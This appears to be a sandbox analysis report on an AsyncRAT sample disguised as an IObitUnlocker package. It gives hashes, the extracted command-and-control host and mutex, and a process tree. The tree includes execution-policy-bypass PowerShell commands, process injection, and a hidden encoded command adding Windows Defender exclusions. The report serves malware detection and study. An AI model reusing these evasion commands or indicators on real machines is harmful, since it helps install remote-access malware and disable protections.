Overview
overview
10Static
static
3IObitUnloc...er.dll
windows7-x64
3IObitUnloc...er.dll
windows10-2004-x64
3IObitUnloc...er.exe
windows7-x64
7IObitUnloc...er.exe
windows10-2004-x64
7IObitUnloc...er.sys
windows7-x64
1IObitUnloc...er.sys
windows10-2004-x64
1IObitUnloc...er.vbs
windows7-x64
3IObitUnloc...er.vbs
windows10-2004-x64
7IObitUnloc...rt.ps1
windows7-x64
10IObitUnloc...rt.ps1
windows10-2004-x64
10Analysis
-
max time kernel
119s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-12-2024 19:29
Static task
static1
Behavioral task
behavioral1
Sample
IObitUnlocker/IObitUnlocker.dll
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
IObitUnlocker/IObitUnlocker.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
IObitUnlocker/IObitUnlocker.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
IObitUnlocker/IObitUnlocker.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
IObitUnlocker/IObitUnlocker.sys
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
IObitUnlocker/IObitUnlocker.sys
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
IObitUnlocker/Loader.vbs
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
IObitUnlocker/Loader.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
IObitUnlocker/Report.ps1
Resource
win7-20240903-en
General
-
Target
IObitUnlocker/Report.ps1
-
Size
457KB
-
MD5
40e7960be05c7c1f64d7157235171ce6
-
SHA1
79df02a409ba3721415e3d2755e467c10f9c698e
-
SHA256
5db5a2e88209a2e2901c8e9e74ad794be31c035a583ec62e73b5e8e22d5df0f0
-
SHA512
6801ed81e4c87b1328906befb506d598ea3eeaec3a835744b3a681104efca02d92db5228189b9859741a380ec54fdf98048f37d690396cfb9b2a7cabe487e2e9
-
SSDEEP
768:FpcM++5necrPLkSqmwEepmixWhkPsc14VcKQ:w
Malware Config
Extracted
asyncrat
A 14
Default
Egypt2.camdvr.org:301
MaterxMutex_Egypt2
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
pid Process 1996 powershell.exe 8816 powershell.exe 2680 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2912 qbgxcc.exe 9040 HashValue.exe -
Loads dropped DLL 2 IoCs
pid Process 1996 powershell.exe 9004 taskeng.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2680 set thread context of 2832 2680 powershell.exe 31 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2832 aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2680 powershell.exe 2832 aspnet_compiler.exe 1996 powershell.exe 2832 aspnet_compiler.exe 1996 powershell.exe 1996 powershell.exe 8816 powershell.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe 9040 HashValue.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2832 aspnet_compiler.exe Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 2912 qbgxcc.exe Token: SeDebugPrivilege 8816 powershell.exe Token: SeDebugPrivilege 9040 HashValue.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2832 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2680 wrote to memory of 2832 2680 powershell.exe 31 PID 2832 wrote to memory of 1152 2832 aspnet_compiler.exe 33 PID 2832 wrote to memory of 1152 2832 aspnet_compiler.exe 33 PID 2832 wrote to memory of 1152 2832 aspnet_compiler.exe 33 PID 2832 wrote to memory of 1152 2832 aspnet_compiler.exe 33 PID 1152 wrote to memory of 1996 1152 cmd.exe 35 PID 1152 wrote to memory of 1996 1152 cmd.exe 35 PID 1152 wrote to memory of 1996 1152 cmd.exe 35 PID 1152 wrote to memory of 1996 1152 cmd.exe 35 PID 1996 wrote to memory of 2912 1996 powershell.exe 36 PID 1996 wrote to memory of 2912 1996 powershell.exe 36 PID 1996 wrote to memory of 2912 1996 powershell.exe 36 PID 1996 wrote to memory of 2912 1996 powershell.exe 36 PID 8784 wrote to memory of 8816 8784 taskeng.exe 40 PID 8784 wrote to memory of 8816 8784 taskeng.exe 40 PID 8784 wrote to memory of 8816 8784 taskeng.exe 40 PID 9004 wrote to memory of 9040 9004 taskeng.exe 43 PID 9004 wrote to memory of 9040 9004 taskeng.exe 43 PID 9004 wrote to memory of 9040 9004 taskeng.exe 43 PID 9040 wrote to memory of 8072 9040 HashValue.exe 44 PID 9040 wrote to memory of 8072 9040 HashValue.exe 44 PID 9040 wrote to memory of 8072 9040 HashValue.exe 44 PID 9040 wrote to memory of 8096 9040 HashValue.exe 45 PID 9040 wrote to memory of 8096 9040 HashValue.exe 45 PID 9040 wrote to memory of 8096 9040 HashValue.exe 45 PID 9040 wrote to memory of 8104 9040 HashValue.exe 46 PID 9040 wrote to memory of 8104 9040 HashValue.exe 46 PID 9040 wrote to memory of 8104 9040 HashValue.exe 46 PID 9040 wrote to memory of 8120 9040 HashValue.exe 47 PID 9040 wrote to memory of 8120 9040 HashValue.exe 47 PID 9040 wrote to memory of 8120 9040 HashValue.exe 47 PID 9040 wrote to memory of 8140 9040 HashValue.exe 48 PID 9040 wrote to memory of 8140 9040 HashValue.exe 48 PID 9040 wrote to memory of 8140 9040 HashValue.exe 48 PID 9040 wrote to memory of 8148 9040 HashValue.exe 49 PID 9040 wrote to memory of 8148 9040 HashValue.exe 49 PID 9040 wrote to memory of 8148 9040 HashValue.exe 49 PID 9040 wrote to memory of 8164 9040 HashValue.exe 50 PID 9040 wrote to memory of 8164 9040 HashValue.exe 50 PID 9040 wrote to memory of 8164 9040 HashValue.exe 50 PID 9040 wrote to memory of 8180 9040 HashValue.exe 51 PID 9040 wrote to memory of 8180 9040 HashValue.exe 51 PID 9040 wrote to memory of 8180 9040 HashValue.exe 51 PID 9040 wrote to memory of 8188 9040 HashValue.exe 52 PID 9040 wrote to memory of 8188 9040 HashValue.exe 52 PID 9040 wrote to memory of 8188 9040 HashValue.exe 52 PID 9040 wrote to memory of 8200 9040 HashValue.exe 53 PID 9040 wrote to memory of 8200 9040 HashValue.exe 53 PID 9040 wrote to memory of 8200 9040 HashValue.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\Report.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qbgxcc.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qbgxcc.exe"'4⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\qbgxcc.exe"C:\Users\Admin\AppData\Local\Temp\qbgxcc.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CCB3B997-DEC0-46AA-956C-8CC76BB33D7B} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:8784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARgBsAGEAZwBzAFwASABhAHMAaABWAGEAbAB1AGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABGAGwAYQBnAHMAXABIAGEAcwBoAFYAYQBsAHUAZQAuAGUAeABlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8816
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1AB46C91-B614-41DE-AFD1-686C96F2FC1C} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:9004 -
C:\Users\Admin\AppData\Roaming\Flags\HashValue.exeC:\Users\Admin\AppData\Roaming\Flags\HashValue.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:9040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8072
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8096
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8104
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8120
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8140
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8148
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8164
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8180
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8188
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵PID:8200
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
636KB
MD5b106cc7d66b582858c053e3df0b2d8b2
SHA1211f794befc4546bd7a9858e945e008fdeb55b28
SHA256c9f58cd90b70ab645546634648de35339786ae3fa14bc8e975c5400a85307ba8
SHA512bf11c3b677cab7ce7cca1aac6eeaeb35bd08d990d55321dd90a022b232c00c6c2562714ee4d8331824c38dd9bc84c111c8065d8e217443fb13175d59dedcb3c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bfbda3a88d369d1e820f5335c415b462
SHA16be2ae429ae2ec3c942dcec3b06a943e7cda6572
SHA2568adffed5e50294ca43dc4dd7dd1038f238c73f28a6175dff5937887a5a714360
SHA51299d539a52004b2fa47e3b09e12fd767f2cfc054995bb94cdf3de004f3f9c057f70ac029d7259c4c9bc313822f2d7c6bdac76b39fa7ea5b1e0c18092c28d03ec2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WPCLKB4NH6T5ZQ0QZALU.temp
Filesize7KB
MD5286d621bef1a4d29e57c0744ac10f253
SHA1650e8b4c585ff0af924a28fcd00574ebca1df52e
SHA256c5215bc2ee8370aaed22a0cfb1c2124e71624fd9f0a0c725955045bd48c3cb0e
SHA51228af585798dbed1071f78ab56c897de4e85e234a0cee5f55c20186f7fca8f5878ef17e745acad941d52d292c170389e25a700bfbd015a61274708657009060b5